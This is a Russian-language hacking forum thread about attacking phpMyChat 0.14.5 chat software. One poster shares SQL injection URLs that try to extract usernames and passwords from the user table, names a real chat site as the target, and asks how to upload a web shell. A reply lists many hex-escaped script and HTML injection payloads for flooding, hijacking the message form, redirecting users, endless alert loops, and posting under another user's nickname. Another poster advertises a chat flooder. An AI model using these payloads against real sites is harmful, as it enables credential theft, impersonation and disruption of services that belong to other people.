Чаты phpMyChat 0.14.5

Grema · 30 Dec 2005

Слыхал что это чюдо очень дырявое... пробывал
http://Target/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
http://Target/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
и так не катит... короче какие есть уязвимости? =)
З.Ы.
ссылка на чат
http://fof.od.ua/chat/index.php
оо... Чють не забыл
http://fof.od.ua/chat/chat/
такой глюк еще есть!
реально ли залить шелл туда?
если да то как?

k0ldun · 30 Dec 2005

ну вот,,, там фильтрация идет : < >,, жду + к репутации/// ещё можешь на секюр-лабе посмотреть

ФЛУД
\x3cscript\x3ewindow.parent.window.input.document.MsgForm.M.value="текст!!!!";window.parent.window.input.document.MsgForm.submit()\x3c/script\x3e\ ...\x3center/

МЕНЯЕТ КНОПКУ
\x3cscript language="JavaScript"\x3ewindow.parent.frames['input'].window.document.forms['MsgForm'].elements['sendForm'].value="ТЕКСТ"\x3b\x3c/script\x3e\x3c/font\x3e

ВСТАВЛЯЕТ МУЗЫКУ
\x3cBGSOUND SRC="http\x3a//http://www2.music.lbn.ru//cgi-bin/banner/40?10780&login=midiru&referer=http%3A%2F%2Fwww.adnet.ru%2Fcgi-bin%2Fiframe%2Fmidi" LOOP="-1" BALANCE"-5000" VOLUME="0"\x3e
\x3cBGSOUND SRC="http\x3a//АДРЕС" LOOP="-1" BALANCE"-5000" VOLUME="0"\x3e

ВЫВОДИТ ОКНО
\x3cscript language="JavaScript"\x3ewindow.alert("ТЕКСТ")\x3b\x3c/script\x3e\x3cfo nt\ x3e\x3c/font\x3e
\x3cscript language="JavaScript" \x3e for (x=1\x3bx \x3c100000\x3b++x) { alert(x)\x3b } while (x\x3e0) \x3b\x3c/script\x3e\x3c/font\x3e\x3c/FONT\x3e\x3c/P\x3e

ВСТАВЛЯЕТ КАРТИНКУ
\x3cimg src="http\x3a//cards.yandex.ru/cards/66163134a1a9adf6e22458864dadc176.jpg" name="imaga"\x3e
195.161.118.159/2838/2838338_11.gif
195.161.118.159/2837/2837048_24.gif

ИЗМЕНЯЕТ РАЗМЕР ШРИФТА
\x3cfont size="2px"\x3e\x3c/font\x3e

ВСТАВЛЕННЫЙ ТЕКСТ
\x3cfont color=`#dc0799` size=9\x3e ТЕКСТ \x3cfont color=`#dc0799` size=2\x3e
\x3cfont color=`#000000` size=9\x3e ТЕКСТ \x3cfont color=`#000000` size=3\x3e

ПЕРЕВОД НА САЙт
\x3cscript language="JavaScript"\x3ewindow.parent.frames['input'].window.document.location="http\x3a//www.yandex.ru"\x3b\x3c/script\x3e\x3cfont\x3e\x3c/font\x3e
\x3cscript language="JavaScript"\x3ewindow.parent.frames['input'].window.document.location="http\x3a//www.ya.ru"\x3b\x3c/script\x3e\x3cfont\x3e\x3c/font\x3e

ТЕКСТ ДВИГАЕТСЯ
\x3cmarquee behavior=`alternate` bgcolor=`black`\x3e\x3c/marquee

ЗАЧЕРКИВАЕТ ВСЕ И ДВИЖЕТСЯ
\x3ch1 \x3e ТЕКСТ \x3c/h1 \x3e\x3cmarquee behavior=`alternate` scrollamount=`15` width=`650` direction=`up`\x3e \x3cs \x3e \x3csmall \x3e

ВСТВЛЯЕШЬ ЛЮБОЙ НИК И ПИШЕШЬ, ЧТО ХОЧЕШЬ)
\x3cbr\x3e\x3cP CLASS="msg"\x3e\x3cSPAN CLASS="time"\x3e00\x3a00\x3a00\x3c/SPAN\x3e \x3cB\x3e[\x3cA HREF="#" onClick="window.parent.АДМИНClick('АДМИ',true)\x3b return false" CLASS="sender"\x3eDama_Пик\x3c/A\x3e]\x3cBDO dir="LTR"\x3e\x3c/BDO\x3e\x3c/B\x3e \x3cFONT\x3e
\x3cbr\x3e\x3cP CLASS="msg"\x3e\x3cSPANCLASS="time"\x3e02\x3a56\x3a54\x3c/SPAN\x3e \x3cB\x3e[\x3cAHREF="#"onClick="window.parent.userClick('Lela',true)\x3b returnfalse" CLASS="sender"\x3eИМЯ\x3c/A\x3e]\x3cBDOdir="LTR"\x3e\x3c/BDO\x3e\x3c/B\x3e \x3cFONT\x3e ТЕКСТ\x3c/font\

ШРИФТ ВЫКИДЫВАЕТ ИЗ ВРЕМЕНИ
\x3cbr\x3e\x3cP CLASS="msg"\x3e\x3cSPAN CLASS="time"\x3e00\x3a00\x3a00\x3cSPAN CLASS="notify" HREF="#" onClick="window.parent.АДМИНClick('M[@]D',notify)\x3b return false" CLASS="sender"\x3eПривет всем\x3c/A\x3e\x3cBDO dir="LTR"\x3e\x3c/BDO\x3e\x3c/B\x3e \x3cFONT\x3e

Изменяет вид шрифта
\x3cfont face="Comic Sans MS"\x3e\x3c/font\x3e Lucida Console

замена фона
\x3cbody background="http\x3a//АДРЕС"\x3e

кнопка
\x3cINPUT type=submit value="Привет!" name INPUT\x3e

Фиг знает что такое
\x3cbr\x3e\x3cP CLASS="msg"\x3e\x3cSPANCLASS="time"\x3e00\x3a00\x3a00\x3cSPAN CLASS="notify"HREF="#"onClick="window.parent.АДМИНClick('M[@]D',notify)\x3b returnfalse" CLASS="sender"\x3eа ТЕКСТ\x3c/A\x3e\x3cBDO dir="LTR"\x3e\x3c/BDO\x3e\x3c/B\x3e\x3cFONT\x3e
Click to expand...

Grema · 30 Dec 2005

А залить шелл можно както?

AdvLamer · 2 Jan 2006

Флудер

Цените мой флудер для phpmychat
http://advlamer.narod.ru >>> Флудер для чата

Gisher · 5 Jan 2006

AdvLamer said:

Цените мой флудер для phpmychat
http://advlamer.narod.ru >>> Флудер для чата
Click to expand...

Молодец)

Чаты phpMyChat 0.14.5

Grema Elder - Старейшина

k0ldun New Member

Grema Elder - Старейшина

AdvLamer Elder - Старейшина

Gisher Elder - Старейшина

Useful Searches

Чаты phpMyChat 0.14.5

Grema Elder - Старейшина

k0ldun New Member

Grema Elder - Старейшина

AdvLamer Elder - Старейшина

Gisher Elder - Старейшина